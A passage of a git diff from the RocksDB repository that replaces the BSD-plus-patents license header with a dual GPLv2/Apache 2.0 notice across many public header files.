Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2013 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/include/rocksdb/compaction_job_stats.h b/include/rocksdb/compaction_job_stats.h index 876809d2c78..ebb04a46bff 100644 --- a/include/rocksdb/compaction_job_stats.h +++ b/include/rocksdb/compaction_job_stats.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #include diff --git a/include/rocksdb/comparator.h b/include/rocksdb/comparator.h index 1c67b0d4ebc..ac6e4a9b096 100644 --- a/include/rocksdb/comparator.h +++ b/include/rocksdb/comparator.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/include/rocksdb/convenience.h b/include/rocksdb/convenience.h index b94a2164094..cb0c6f56b5c 100644 --- a/include/rocksdb/convenience.h +++ b/include/rocksdb/convenience.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/include/rocksdb/db.h b/include/rocksdb/db.h index 67d4aac43cf..ee5706b4c8b 100644 --- a/include/rocksdb/db.h +++ b/include/rocksdb/db.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/include/rocksdb/db_bench_tool.h b/include/rocksdb/db_bench_tool.h index 0e33ae96e2d..047c4256ce6 100644 --- a/include/rocksdb/db_bench_tool.h +++ b/include/rocksdb/db_bench_tool.h @@ -1,7 +1,7 @@ // Copyright (c) 2013-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once namespace rocksdb { diff --git a/include/rocksdb/db_dump_tool.h b/include/rocksdb/db_dump_tool.h index 3ae2c29322d..cb9a265f5c8 100644 --- a/include/rocksdb/db_dump_tool.h +++ b/include/rocksdb/db_dump_tool.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/include/rocksdb/env.h b/include/rocksdb/env.h index 682fc65c5fc..8690738998f 100644 --- a/include/rocksdb/env.h +++ b/include/rocksdb/env.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/include/rocksdb/env_encryption.h b/include/rocksdb/env_encryption.h index 764fffba779..e4c924a4b4c 100644 --- a/include/rocksdb/env_encryption.h +++ b/include/rocksdb/env_encryption.h @@ -1,9 +1,7 @@ // Copyright (c) 2016-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/include/rocksdb/experimental.h b/include/rocksdb/experimental.h index 70ad0b914bd..0592fe36b17 100644 --- a/include/rocksdb/experimental.h +++ b/include/rocksdb/experimental.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/include/rocksdb/filter_policy.h b/include/rocksdb/filter_policy.h index 0593c04a1c1..8c813d93e65 100644 --- a/include/rocksdb/filter_policy.h +++ b/include/rocksdb/filter_policy.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2012 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/include/rocksdb/flush_block_policy.h b/include/rocksdb/flush_block_policy.h index 19a58dc0193..5daa9676248 100644 --- a/include/rocksdb/flush_block_policy.h +++ b/include/rocksdb/flush_block_policy.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/include/rocksdb/iostats_context.h b/include/rocksdb/iostats_context.h index 73a86c557bc..77a59643a1c 100644 --- a/include/rocksdb/iostats_context.h +++ b/include/rocksdb/iostats_context.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #include diff --git a/include/rocksdb/iterator.h b/include/rocksdb/iterator.h index 9bfb0e3d61f..4e09f64e9a6 100644 --- a/include/rocksdb/iterator.h +++ b/include/rocksdb/iterator.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/include/rocksdb/ldb_tool.h b/include/rocksdb/ldb_tool.h index efe450b5912..0ec2da9fc05 100644 --- a/include/rocksdb/ldb_tool.h +++ b/include/rocksdb/ldb_tool.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE #pragma once #include diff --git a/include/rocksdb/memtablerep.h b/include/rocksdb/memtablerep.h index e00a03cd908..347dd3096c2 100644 --- a/include/rocksdb/memtablerep.h +++ b/include/rocksdb/memtablerep.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file contains the interface that must be implemented by any collection // to be used as the backing store for a MemTable. Such a collection must diff --git a/include/rocksdb/merge_operator.h b/include/rocksdb/merge_operator.h index 0ec737ab889..5fe3e0bfda8 100644 --- a/include/rocksdb/merge_operator.h +++ b/include/rocksdb/merge_operator.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef STORAGE_ROCKSDB_INCLUDE_MERGE_OPERATOR_H_ #define STORAGE_ROCKSDB_INCLUDE_MERGE_OPERATOR_H_ diff --git a/include/rocksdb/metadata.h b/include/rocksdb/metadata.h index 0b838263308..37e7b50b9b7 100644 --- a/include/rocksdb/metadata.h +++ b/include/rocksdb/metadata.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/include/rocksdb/options.h b/include/rocksdb/options.h index 1c90a68be57..4d2f143a0f7 100644 --- a/include/rocksdb/options.h +++ b/include/rocksdb/options.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/include/rocksdb/perf_context.h b/include/rocksdb/perf_context.h index ff9449a5421..ff1a0caccbe 100644 --- a/include/rocksdb/perf_context.h +++ b/include/rocksdb/perf_context.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef STORAGE_ROCKSDB_INCLUDE_PERF_CONTEXT_H #define STORAGE_ROCKSDB_INCLUDE_PERF_CONTEXT_H diff --git a/include/rocksdb/perf_level.h b/include/rocksdb/perf_level.h index 89c9cdd4862..84a331c355e 100644 --- a/include/rocksdb/perf_level.h +++ b/include/rocksdb/perf_level.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef INCLUDE_ROCKSDB_PERF_LEVEL_H_ #define INCLUDE_ROCKSDB_PERF_LEVEL_H_ diff --git a/include/rocksdb/persistent_cache.h b/include/rocksdb/persistent_cache.h index 352a433148a..05c36852a55 100644 --- a/include/rocksdb/persistent_cache.h +++ b/include/rocksdb/persistent_cache.h @@ -1,7 +1,7 @@ // Copyright (c) 2013, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/include/rocksdb/rate_limiter.h b/include/rocksdb/rate_limiter.h index 03976a9f6cf..838c98a6de6 100644 --- a/include/rocksdb/rate_limiter.h +++ b/include/rocksdb/rate_limiter.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/include/rocksdb/slice.h b/include/rocksdb/slice.h index 33f77a0e589..fe8dee00f04 100644 --- a/include/rocksdb/slice.h +++ b/include/rocksdb/slice.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/include/rocksdb/slice_transform.h b/include/rocksdb/slice_transform.h index 854e0bb17be..fc82bf58456 100644 --- a/include/rocksdb/slice_transform.h +++ b/include/rocksdb/slice_transform.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2012 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/include/rocksdb/snapshot.h b/include/rocksdb/snapshot.h index 25c90a4076c..a96eb763e3e 100644 --- a/include/rocksdb/snapshot.h +++ b/include/rocksdb/snapshot.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/include/rocksdb/sst_dump_tool.h b/include/rocksdb/sst_dump_tool.h index 0dd94caba0f..021faa019cc 100644 --- a/include/rocksdb/sst_dump_tool.h +++ b/include/rocksdb/sst_dump_tool.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE #pragma once diff --git a/include/rocksdb/sst_file_manager.h b/include/rocksdb/sst_file_manager.h index 665fb0e2664..692007d31a2 100644 --- a/include/rocksdb/sst_file_manager.h +++ b/include/rocksdb/sst_file_manager.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/include/rocksdb/sst_file_writer.h b/include/rocksdb/sst_file_writer.h index 2d6ec427dd5..04d5c271a0a 100644 --- a/include/rocksdb/sst_file_writer.h +++ b/include/rocksdb/sst_file_writer.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/include/rocksdb/statistics.h b/include/rocksdb/statistics.h index 05390e489df..b4629358e66 100644 --- a/include/rocksdb/statistics.h +++ b/include/rocksdb/statistics.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef STORAGE_ROCKSDB_INCLUDE_STATISTICS_H_ #define STORAGE_ROCKSDB_INCLUDE_STATISTICS_H_ diff --git a/include/rocksdb/status.h b/include/rocksdb/status.h index c30abf191d5..709f3837098 100644 --- a/include/rocksdb/status.h +++ b/include/rocksdb/status.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/include/rocksdb/thread_status.h b/include/rocksdb/thread_status.h index 294c6cb3b58..55c32ed6d2f 100644 --- a/include/rocksdb/thread_status.h +++ b/include/rocksdb/thread_status.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file defines the structures for exposing run-time status of any // rocksdb-related thread. Such run-time status can be obtained via diff --git a/include/rocksdb/threadpool.h b/include/rocksdb/threadpool.h index 3711276d853..e871ee18c7a 100644 --- a/include/rocksdb/threadpool.h +++ b/include/rocksdb/threadpool.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/include/rocksdb/transaction_log.h b/include/rocksdb/transaction_log.h index 1fb93ace16e..7fc46ae2645 100644 --- a/include/rocksdb/transaction_log.h +++ b/include/rocksdb/transaction_log.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef STORAGE_ROCKSDB_INCLUDE_TRANSACTION_LOG_ITERATOR_H_ #define STORAGE_ROCKSDB_INCLUDE_TRANSACTION_LOG_ITERATOR_H_ diff --git a/include/rocksdb/types.h b/include/rocksdb/types.h index 6a477cab89e..106ac2f76bf 100644 --- a/include/rocksdb/types.h +++ b/include/rocksdb/types.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef STORAGE_ROCKSDB_INCLUDE_TYPES_H_ #define STORAGE_ROCKSDB_INCLUDE_TYPES_H_ diff --git a/include/rocksdb/universal_compaction.h b/include/rocksdb/universal_compaction.h index d22b7c1d12d..ed2220873cd 100644 --- a/include/rocksdb/universal_compaction.h +++ b/include/rocksdb/universal_compaction.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef STORAGE_ROCKSDB_UNIVERSAL_COMPACTION_OPTIONS_H #define STORAGE_ROCKSDB_UNIVERSAL_COMPACTION_OPTIONS_H diff --git a/include/rocksdb/utilities/backupable_db.h b/include/rocksdb/utilities/backupable_db.h index 7eae157752d..fc2b6ba43f7 100644 --- a/include/rocksdb/utilities/backupable_db.h +++ b/include/rocksdb/utilities/backupable_db.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/include/rocksdb/utilities/checkpoint.h b/include/rocksdb/utilities/checkpoint.h index b6e0e169a04..aa0a394d4d0 100644 --- a/include/rocksdb/utilities/checkpoint.h +++ b/include/rocksdb/utilities/checkpoint.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // A checkpoint is an openable snapshot of a database at a point in time. diff --git a/include/rocksdb/utilities/convenience.h b/include/rocksdb/utilities/convenience.h index b0ac15c6dfd..f61afd69ef8 100644 --- a/include/rocksdb/utilities/convenience.h +++ b/include/rocksdb/utilities/convenience.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/include/rocksdb/utilities/date_tiered_db.h b/include/rocksdb/utilities/date_tiered_db.h index 1db642776b3..f259b05a8ae 100644 --- a/include/rocksdb/utilities/date_tiered_db.h +++ b/include/rocksdb/utilities/date_tiered_db.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/include/rocksdb/utilities/db_ttl.h b/include/rocksdb/utilities/db_ttl.h index 1f65bd4a284..7c9c0cc55a6 100644 --- a/include/rocksdb/utilities/db_ttl.h +++ b/include/rocksdb/utilities/db_ttl.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/include/rocksdb/utilities/debug.h b/include/rocksdb/utilities/debug.h index 1ef52c1025a..f29fa045cba 100644 --- a/include/rocksdb/utilities/debug.h +++ b/include/rocksdb/utilities/debug.h @@ -1,7 +1,7 @@ // Copyright (c) 2017-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // This source code is also licensed under the GPLv2 license found in the // COPYING file in the root directory of this source tree. diff --git a/include/rocksdb/utilities/document_db.h b/include/rocksdb/utilities/document_db.h index 45ee87da3e4..3668a50b9d2 100644 --- a/include/rocksdb/utilities/document_db.h +++ b/include/rocksdb/utilities/document_db.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/include/rocksdb/utilities/env_librados.h b/include/rocksdb/utilities/env_librados.h index a3db0e30d6b..272365f0c64 100644 --- a/include/rocksdb/utilities/env_librados.h +++ b/include/rocksdb/utilities/env_librados.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_UTILITIES_ENV_LIBRADOS_H #define ROCKSDB_UTILITIES_ENV_LIBRADOS_H diff --git a/include/rocksdb/utilities/env_mirror.h b/include/rocksdb/utilities/env_mirror.h index e0ead08a843..ffd175ae5e6 100644 --- a/include/rocksdb/utilities/env_mirror.h +++ b/include/rocksdb/utilities/env_mirror.h @@ -1,7 +1,7 @@ // Copyright (c) 2015, Red Hat, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/include/rocksdb/utilities/geo_db.h 